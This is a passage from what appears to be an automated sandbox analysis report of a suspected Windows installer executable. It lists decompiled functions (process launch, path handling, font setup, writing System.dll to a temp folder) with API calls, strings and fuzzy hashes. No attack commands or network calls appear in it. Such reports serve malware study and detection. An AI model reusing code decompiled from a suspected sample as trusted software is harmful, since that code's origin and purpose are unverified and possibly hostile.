				if(_t7 != 0) {
					CloseHandle(_v20.hThread);
					return _v20.hProcess;
				}
				return _t7;
			}





                                                                                                            0x004053cf
                                                                                                            0x004053eb
                                                                                                            0x004053f3
                                                                                                            0x004053f8
                                                                                                            0x00000000
                                                                                                            0x004053fe
                                                                                                            0x00405402

                                                                                                            APIs
                                                                                                            • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004224A8,Error launching installer), ref: 004053EB
                                                                                                            • CloseHandle.KERNEL32(?), ref: 004053F8
                                                                                                            Strings
                                                                                                            • Error launching installer, xrefs: 004053D9
                                                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 004053C6
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.341219555.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.341191380.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341243931.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341257796.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341352308.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341409898.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341500620.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: CloseCreateHandleProcess
                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\$Error launching installer
                                                                                                            • API String ID: 3712363035-4043152584
                                                                                                            • Opcode ID: 3b814a6f076d0ba9038e170a1e0f3647fdefee354992cb10a65e7e77ca0a2381
                                                                                                            • Instruction ID: 069b69ca15cd8b990da55ccc95fe3be7356009797bdfa18ab8f6d6c8c96e71ef
                                                                                                            • Opcode Fuzzy Hash: 3b814a6f076d0ba9038e170a1e0f3647fdefee354992cb10a65e7e77ca0a2381
                                                                                                            • Instruction Fuzzy Hash: A3E0ECB4A00219BFDB00AF64ED49AAB7BBDEB00305F90C522A911E2150D775D8118AB9
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00405659, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E00405659(CHAR* _a4) {
				CHAR* _t7;

				_t7 = _a4;
				if( *(CharPrevA(_t7,  &(_t7[lstrlenA(_t7)]))) != 0x5c) {
					lstrcatA(_t7, 0x409010);
				}
				return _t7;
			}




                                                                                                            0x0040565a
                                                                                                            0x00405671
                                                                                                            0x00405679
                                                                                                            0x00405679
                                                                                                            0x00405681

                                                                                                            APIs
                                                                                                            • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403226,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403386), ref: 0040565F
                                                                                                            • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403226,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403386), ref: 00405668
                                                                                                            • lstrcatA.KERNEL32(?,00409010), ref: 00405679
                                                                                                            Strings
                                                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00405659
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.341219555.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.341191380.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341243931.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341257796.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341352308.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341409898.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341500620.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: CharPrevlstrcatlstrlen
                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                            • API String ID: 2659869361-3936084776
                                                                                                            • Opcode ID: f17b2ccdaa8efd10834e0f4341d4d5b977b2bb6e8559feba5c8cad9ccc1df0ef
                                                                                                            • Instruction ID: d5422d5486d5b384c4dcc02911800b35c31fcf4388d9dde419d5dff5703c7688
                                                                                                            • Opcode Fuzzy Hash: f17b2ccdaa8efd10834e0f4341d4d5b977b2bb6e8559feba5c8cad9ccc1df0ef
                                                                                                            • Instruction Fuzzy Hash: 8BD05272605A202ED2022A258C05E9B7A28CF06311B044866B540B2292C6386D818AEE
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00401EC5, Relevance: 6.1, APIs: 4, Instructions: 54memoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 85%
                                                                                                            			E00401EC5(char __ebx, char* __edi, char* __esi) {
				char* _t18;
				int _t19;
				void* _t30;

				_t18 = E004029F6(0xffffffee);
				 *(_t30 - 0x2c) = _t18;
				_t19 = GetFileVersionInfoSizeA(_t18, _t30 - 0x30);
				 *__esi = __ebx;
				 *(_t30 - 8) = _t19;
				 *__edi = __ebx;
				 *((intOrPtr*)(_t30 - 4)) = 1;
				if(_t19 != __ebx) {
					__eax = GlobalAlloc(0x40, __eax);
					 *(__ebp + 8) = __eax;
					if(__eax != __ebx) {
						if(__eax != 0) {
							__ebp - 0x44 = __ebp - 0x34;
							if(VerQueryValueA( *(__ebp + 8), 0x409010, __ebp - 0x34, __ebp - 0x44) != 0) {
								 *(__ebp - 0x34) = E00405AC4(__esi,  *((intOrPtr*)( *(__ebp - 0x34) + 8)));
								 *(__ebp - 0x34) = E00405AC4(__edi,  *((intOrPtr*)( *(__ebp - 0x34) + 0xc)));
								 *((intOrPtr*)(__ebp - 4)) = __ebx;
							}
						}
						_push( *(__ebp + 8));
						GlobalFree();
					}
				}
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t30 - 4));
				return 0;
			}






                                                                                                            0x00401ec7
                                                                                                            0x00401ecf
                                                                                                            0x00401ed4
                                                                                                            0x00401ed9
                                                                                                            0x00401edd
                                                                                                            0x00401ee0
                                                                                                            0x00401ee2
                                                                                                            0x00401ee9
                                                                                                            0x00401ef2
                                                                                                            0x00401efa
                                                                                                            0x00401efd
                                                                                                            0x00401f12
                                                                                                            0x00401f18
                                                                                                            0x00401f2b
                                                                                                            0x00401f34
                                                                                                            0x00401f40
                                                                                                            0x00401f45
                                                                                                            0x00401f45
                                                                                                            0x00401f2b
                                                                                                            0x00401f48
                                                                                                            0x00401b75
                                                                                                            0x00401b75
                                                                                                            0x00401efd
                                                                                                            0x0040288e
                                                                                                            0x0040289a

                                                                                                            APIs
                                                                                                            • GetFileVersionInfoSizeA.VERSION(00000000,?,000000EE), ref: 00401ED4
                                                                                                            • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401EF2
                                                                                                            • GetFileVersionInfoA.VERSION(?,?,?,00000000), ref: 00401F0B
                                                                                                            • VerQueryValueA.VERSION(?,00409010,?,?,?,?,?,00000000), ref: 00401F24
                                                                                                              • Part of subcall function 00405AC4: wsprintfA.USER32 ref: 00405AD1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.341219555.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.341191380.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341243931.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341257796.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341352308.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341409898.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341500620.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
                                                                                                            • String ID:
                                                                                                            • API String ID: 1404258612-0
                                                                                                            • Opcode ID: be50ba22476c795dccddfbd46c0b19e6aec7ed87346bdfd2eed6167faf837e67
                                                                                                            • Instruction ID: 178fa6cf4330108057832d0c189c0e5a27020503733a18e797ef1cc5e9d7aef6
                                                                                                            • Opcode Fuzzy Hash: be50ba22476c795dccddfbd46c0b19e6aec7ed87346bdfd2eed6167faf837e67
                                                                                                            • Instruction Fuzzy Hash: 52113A71A00108BEDB01EFA5DD819AEBBB9EB48344B20853AF501F61E1D7389A54DB28
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00401D1B, Relevance: 6.0, APIs: 4, Instructions: 34COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 67%
                                                                                                            			E00401D1B() {
				void* __esi;
				int _t6;
				signed char _t11;
				struct HFONT__* _t14;
				void* _t18;
				void* _t24;
				void* _t26;
				void* _t28;

				_t6 = GetDeviceCaps(GetDC( *(_t28 - 0x34)), 0x5a);
				0x40af74->lfHeight =  ~(MulDiv(E004029D9(2), _t6, 0x48));
				 *0x40af84 = E004029D9(3);
				_t11 =  *((intOrPtr*)(_t28 - 0x14));
				 *0x40af8b = 1;
				 *0x40af88 = _t11 & 0x00000001;
				 *0x40af89 = _t11 & 0x00000002;
				 *0x40af8a = _t11 & 0x00000004;
				E00405B88(_t18, _t24, _t26, 0x40af90,  *((intOrPtr*)(_t28 - 0x20)));
				_t14 = CreateFontIndirectA(0x40af74);
				_push(_t14);
				_push(_t26);
				E00405AC4();
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t28 - 4));
				return 0;
			}











                                                                                                            0x00401d29
                                                                                                            0x00401d42
                                                                                                            0x00401d4c
                                                                                                            0x00401d51
                                                                                                            0x00401d5c
                                                                                                            0x00401d63
                                                                                                            0x00401d75
                                                                                                            0x00401d7b
                                                                                                            0x00401d80
                                                                                                            0x00401d8a
                                                                                                            0x004024b8
                                                                                                            0x00401561
                                                                                                            0x00402833
                                                                                                            0x0040288e
                                                                                                            0x0040289a

                                                                                                            APIs
                                                                                                            • GetDC.USER32(?), ref: 00401D22
                                                                                                            • GetDeviceCaps.GDI32(00000000), ref: 00401D29
                                                                                                            • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D38
                                                                                                            • CreateFontIndirectA.GDI32(0040AF74), ref: 00401D8A
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.341219555.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.341191380.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341243931.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341257796.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341352308.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341409898.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341500620.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: CapsCreateDeviceFontIndirect
                                                                                                            • String ID:
                                                                                                            • API String ID: 3272661963-0
                                                                                                            • Opcode ID: 2c6a9fd6684e48c72e8170f31dde3613139c4976fc228405473ba1f45ca6ba00
                                                                                                            • Instruction ID: d83410998d1654a5337f8c322709d39cf2ce3a8a4f0330bc6585c9693e616625
                                                                                                            • Opcode Fuzzy Hash: 2c6a9fd6684e48c72e8170f31dde3613139c4976fc228405473ba1f45ca6ba00
                                                                                                            • Instruction Fuzzy Hash: E1F044F1A45342AEE7016770AE0ABA93B649725306F100576F541BA1E2C5BC10149B7F
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00403978, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 71COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E00403978(void* __ecx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short _t6;
				intOrPtr _t11;
				signed int _t13;
				signed int _t16;
				signed short* _t18;
				signed int _t20;
				signed short* _t23;
				intOrPtr _t25;
				signed int _t26;
				intOrPtr* _t27;

				_t24 = "1033";
				_t13 = 0xffff;
				_t6 = E00405ADD(__ecx, "1033");
				while(1) {
					_t26 =  *0x423ee4;
					if(_t26 == 0) {
						goto L7;
					}
					_t16 =  *( *0x423eb0 + 0x64);
					_t20 =  ~_t16;
					_t18 = _t16 * _t26 +  *0x423ee0;
					while(1) {
						_t18 = _t18 + _t20;
						_t26 = _t26 - 1;
						if((( *_t18 ^ _t6) & _t13) == 0) {
							break;
						}
						if(_t26 != 0) {
							continue;
						}
						goto L7;
					}
					 *0x423680 = _t18[1];
					 *0x423f48 = _t18[3];
					_t23 =  &(_t18[5]);
					if(_t23 != 0) {
						 *0x42367c = _t23;
						E00405AC4(_t24,  *_t18 & 0x0000ffff);
						SetWindowTextA( *0x420478, E00405B88(_t13, _t24, _t26, 0x4236a0, 0xfffffffe));
						_t11 =  *0x423ecc;
						_t27 =  *0x423ec8;
						if(_t11 == 0) {
							L15:
							return _t11;
						}
						_t25 = _t11;
						do {
							_t11 =  *_t27;
							if(_t11 != 0) {
								_t11 = E00405B88(_t13, _t25, _t27, _t27 + 0x18, _t11);
							}
							_t27 = _t27 + 0x418;
							_t25 = _t25 - 1;
						} while (_t25 != 0);
						goto L15;
					}
					L7:
					if(_t13 != 0xffff) {
						_t13 = 0;
					} else {
						_t13 = 0x3ff;
					}
				}
			}
















                                                                                                            0x0040397c
                                                                                                            0x00403981
                                                                                                            0x00403987
                                                                                                            0x0040398c
                                                                                                            0x0040398c
                                                                                                            0x00403994
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x0040399c
                                                                                                            0x004039a4
                                                                                                            0x004039a6
                                                                                                            0x004039ac
                                                                                                            0x004039ac
                                                                                                            0x004039ae
                                                                                                            0x004039ba
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x004039be
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x004039c0
                                                                                                            0x004039c5
                                                                                                            0x004039ce
                                                                                                            0x004039d4
                                                                                                            0x004039d9
                                                                                                            0x004039ed
                                                                                                            0x004039f8
                                                                                                            0x00403a10
                                                                                                            0x00403a16
                                                                                                            0x00403a1b
                                                                                                            0x00403a23
                                                                                                            0x00403a44
                                                                                                            0x00403a44
                                                                                                            0x00403a44
                                                                                                            0x00403a25
                                                                                                            0x00403a27
                                                                                                            0x00403a27
                                                                                                            0x00403a2b
                                                                                                            0x00403a32
                                                                                                            0x00403a32
                                                                                                            0x00403a37
                                                                                                            0x00403a3d
                                                                                                            0x00403a3d
                                                                                                            0x00000000
                                                                                                            0x00403a27
                                                                                                            0x004039db
                                                                                                            0x004039e0
                                                                                                            0x004039e9
                                                                                                            0x004039e2
                                                                                                            0x004039e2
                                                                                                            0x004039e2
                                                                                                            0x004039e0

                                                                                                            APIs
                                                                                                            • SetWindowTextA.USER32(00000000,004236A0), ref: 00403A10
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.341219555.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.341191380.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341243931.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341257796.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341352308.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341409898.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341500620.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: TextWindow
                                                                                                            • String ID: 1033$C:\Users\user\AppData\Local\Temp\
                                                                                                            • API String ID: 530164218-3512041753
                                                                                                            • Opcode ID: defed7287a9455a29b24b67e45bb8aa9d1031aed7a359321573c6b72916d69ed
                                                                                                            • Instruction ID: 09623374405f0611f065d620c03919b516a5f167df25bc0d5edc66fe9dc562c0
                                                                                                            • Opcode Fuzzy Hash: defed7287a9455a29b24b67e45bb8aa9d1031aed7a359321573c6b72916d69ed
                                                                                                            • Instruction Fuzzy Hash: F611C2B1B005109BC730DF15D880A73767DEB84716369413BE94167391C77EAE028E58
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00404E54, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E00404E54(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				long _t22;

				if(_a8 != 0x102) {
					if(_a8 != 0x200) {
						_t22 = _a16;
						L7:
						if(_a8 == 0x419 &&  *0x420488 != _t22) {
							 *0x420488 = _t22;
							E00405B66(0x4204a0, 0x424000);
							E00405AC4(0x424000, _t22);
							E0040140B(6);
							E00405B66(0x424000, 0x4204a0);
						}
						L11:
						return CallWindowProcA( *0x420490, _a4, _a8, _a12, _t22);
					}
					if(IsWindowVisible(_a4) == 0) {
						L10:
						_t22 = _a16;
						goto L11;
					}
					_t22 = E004047D3(_a4, 1);
					_a8 = 0x419;
					goto L7;
				}
				if(_a12 != 0x20) {
					goto L10;
				}
				E00403F64(0x413);
				return 0;
			}




                                                                                                            0x00404e60
                                                                                                            0x00404e85
                                                                                                            0x00404ea5
                                                                                                            0x00404ea8
                                                                                                            0x00404eab
                                                                                                            0x00404ec2
                                                                                                            0x00404ec8
                                                                                                            0x00404ecf
                                                                                                            0x00404ed6
                                                                                                            0x00404edd
                                                                                                            0x00404ee2
                                                                                                            0x00404ee8
                                                                                                            0x00000000
                                                                                                            0x00404ef8
                                                                                                            0x00404e92
                                                                                                            0x00404ee5
                                                                                                            0x00404ee5
                                                                                                            0x00000000
                                                                                                            0x00404ee5
                                                                                                            0x00404e9e
                                                                                                            0x00404ea0
                                                                                                            0x00000000
                                                                                                            0x00404ea0
                                                                                                            0x00404e66
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00404e6d
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            • IsWindowVisible.USER32(?), ref: 00404E8A
                                                                                                            • CallWindowProcA.USER32 ref: 00404EF8
                                                                                                              • Part of subcall function 00403F64: SendMessageA.USER32(?,00000000,00000000,00000000), ref: 00403F76
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.341219555.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.341191380.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341243931.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341257796.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341352308.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341409898.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341500620.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: Window$CallMessageProcSendVisible
                                                                                                            • String ID:
                                                                                                            • API String ID: 3748168415-3916222277
                                                                                                            • Opcode ID: 1a28ca64547386e1a64dd11c64f6ae458e1df03769ff3acb3952d776ac0a4b66
                                                                                                            • Instruction ID: 62f3a1a08e098275047049d4f9968a6b4933f6b7f921e7009373277d82a30415
                                                                                                            • Opcode Fuzzy Hash: 1a28ca64547386e1a64dd11c64f6ae458e1df03769ff3acb3952d776ac0a4b66
                                                                                                            • Instruction Fuzzy Hash: D1116D71900208BBDB21AF52DC4499B3669FB84369F00803BF6047A2E2C37C5A519BAD
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 004024BE, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34filestringCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E004024BE(struct _OVERLAPPED* __ebx, intOrPtr* __esi) {
				int _t5;
				long _t7;
				struct _OVERLAPPED* _t11;
				intOrPtr* _t15;
				void* _t17;
				int _t21;

				_t15 = __esi;
				_t11 = __ebx;
				if( *((intOrPtr*)(_t17 - 0x1c)) == __ebx) {
					_t7 = lstrlenA(E004029F6(0x11));
				} else {
					E004029D9(1);
					 *0x409f70 = __al;
				}
				if( *_t15 == _t11) {
					L8:
					 *((intOrPtr*)(_t17 - 4)) = 1;
				} else {
					_t5 = WriteFile(E00405ADD(_t17 + 8, _t15), "C:\Users\engineer\AppData\Local\Temp\nse5FEA.tmp\System.dll", _t7, _t17 + 8, _t11);
					_t21 = _t5;
					if(_t21 == 0) {
						goto L8;
					}
				}
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t17 - 4));
				return 0;
			}









                                                                                                            0x004024be
                                                                                                            0x004024be
                                                                                                            0x004024c1
                                                                                                            0x004024dc
                                                                                                            0x004024c3
                                                                                                            0x004024c5
                                                                                                            0x004024ca
                                                                                                            0x004024d1
                                                                                                            0x004024e3
                                                                                                            0x0040265c
                                                                                                            0x0040265c
                                                                                                            0x004024e9
                                                                                                            0x004024fb
                                                                                                            0x004015a6
                                                                                                            0x004015a8
                                                                                                            0x00000000
                                                                                                            0x004015ae
                                                                                                            0x004015a8
                                                                                                            0x0040288e
                                                                                                            0x0040289a

                                                                                                            APIs
                                                                                                            • lstrlenA.KERNEL32(00000000,00000011), ref: 004024DC
                                                                                                            • WriteFile.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\nse5FEA.tmp\System.dll,00000000,?,?,00000000,00000011), ref: 004024FB
                                                                                                            Strings
                                                                                                            • C:\Users\user\AppData\Local\Temp\nse5FEA.tmp\System.dll, xrefs: 004024CA, 004024EF
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.341219555.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.341191380.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341243931.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341257796.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341352308.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341409898.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341500620.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: FileWritelstrlen
                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\nse5FEA.tmp\System.dll
                                                                                                            • API String ID: 427699356-3367663585
                                                                                                            • Opcode ID: 02a15bd42c28bed1fb8554f3d16374f042fc662dbffd218bbabce7ee12e12458
                                                                                                            • Instruction ID: 2c1f07a632d72534084a5ac00d75746702f795d1104bf50e8da4b719a2e94720
                                                                                                            • Opcode Fuzzy Hash: 02a15bd42c28bed1fb8554f3d16374f042fc662dbffd218bbabce7ee12e12458
                                                                                                            • Instruction Fuzzy Hash: BCF08972A44245FFD710EBB19E49EAF7668DB00348F14443BB142F51C2D6FC5982976D
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 0040361A, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E0040361A() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t8;

				_t8 =  *0x41f45c;
				_t3 = E004035FF(_t2, 0);
				if(_t8 != 0) {
					do {
						_t6 = _t8;
						_t8 =  *_t8;
						FreeLibrary( *(_t6 + 8));
						_t3 = GlobalFree(_t6);
					} while (_t8 != 0);
				}
				 *0x41f45c =  *0x41f45c & 0x00000000;
				return _t3;
			}







                                                                                                            0x0040361b
                                                                                                            0x00403623
                                                                                                            0x0040362a
                                                                                                            0x0040362d
                                                                                                            0x0040362d
                                                                                                            0x0040362f
                                                                                                            0x00403634
                                                                                                            0x0040363b
                                                                                                            0x00403641
                                                                                                            0x00403645
                                                                                                            0x00403646
                                                                                                            0x0040364e

                                                                                                            APIs
                                                                                                            • FreeLibrary.KERNEL32(?,"C:\Users\user\Desktop\5t2CmTUhKc.exe" ,00000000,747DF560,004035F1,00000000,0040342D,00000000), ref: 00403634
                                                                                                            • GlobalFree.KERNEL32 ref: 0040363B
                                                                                                            Strings
                                                                                                            • "C:\Users\user\Desktop\5t2CmTUhKc.exe" , xrefs: 0040362C
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.341219555.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.341191380.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341243931.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341257796.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341352308.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341409898.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341500620.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: Free$GlobalLibrary
                                                                                                            • String ID: "C:\Users\user\Desktop\5t2CmTUhKc.exe"
                                                                                                            • API String ID: 1100898210-1422230029
                                                                                                            • Opcode ID: 594683390acbace1feb38ee5af495b240e475f157c4d409b541952378f73dbd9
                                                                                                            • Instruction ID: 07f203a12dc211ea1540440f4769086933c1ddaa55d0411da1bb29b7fd771b51
                                                                                                            • Opcode Fuzzy Hash: 594683390acbace1feb38ee5af495b240e475f157c4d409b541952378f73dbd9
                                                                                                            • Instruction Fuzzy Hash: 8FE08C32804420ABC6216F55EC0579A7768AB48B22F028536E900BB3A083743C464BDC
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 004056A0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E004056A0(char* _a4) {
				char* _t3;
				char* _t5;

				_t5 = _a4;
				_t3 =  &(_t5[lstrlenA(_t5)]);
				while( *_t3 != 0x5c) {
					_t3 = CharPrevA(_t5, _t3);
					if(_t3 > _t5) {
						continue;
					}
					break;
				}
				 *_t3 =  *_t3 & 0x00000000;
				return  &(_t3[1]);
			}





                                                                                                            0x004056a1
                                                                                                            0x004056ab
                                                                                                            0x004056ad
                                                                                                            0x004056b4
                                                                                                            0x004056bc
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x004056bc
                                                                                                            0x004056be
                                                                                                            0x004056c3

                                                                                                            APIs
                                                                                                            • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402CDE,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\5t2CmTUhKc.exe,C:\Users\user\Desktop\5t2CmTUhKc.exe,80000000,00000003), ref: 004056A6
                                                                                                            • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402CDE,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\5t2CmTUhKc.exe,C:\Users\user\Desktop\5t2CmTUhKc.exe,80000000,00000003), ref: 004056B4
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.341219555.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.341191380.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341243931.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341257796.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341352308.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341409898.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341500620.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: CharPrevlstrlen
                                                                                                            • String ID: C:\Users\user\Desktop
                                                                                                            • API String ID: 2709904686-3125694417
                                                                                                            • Opcode ID: 49376fbf8c9c30057c1bc985cc011eea510fd351d3a644e674ee9e82abf7fe19
                                                                                                            • Instruction ID: 6658d1b0ab05e5211e75f0b74aef41c49d7b43cb9628f8e009f88ad9fa15a52a
                                                                                                            • Opcode Fuzzy Hash: 49376fbf8c9c30057c1bc985cc011eea510fd351d3a644e674ee9e82abf7fe19
                                                                                                            • Instruction Fuzzy Hash: C5D0A772409DB02EF30352108C04B8F7A98CF17300F0948A2E440E21D0C27C5C818FFD
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

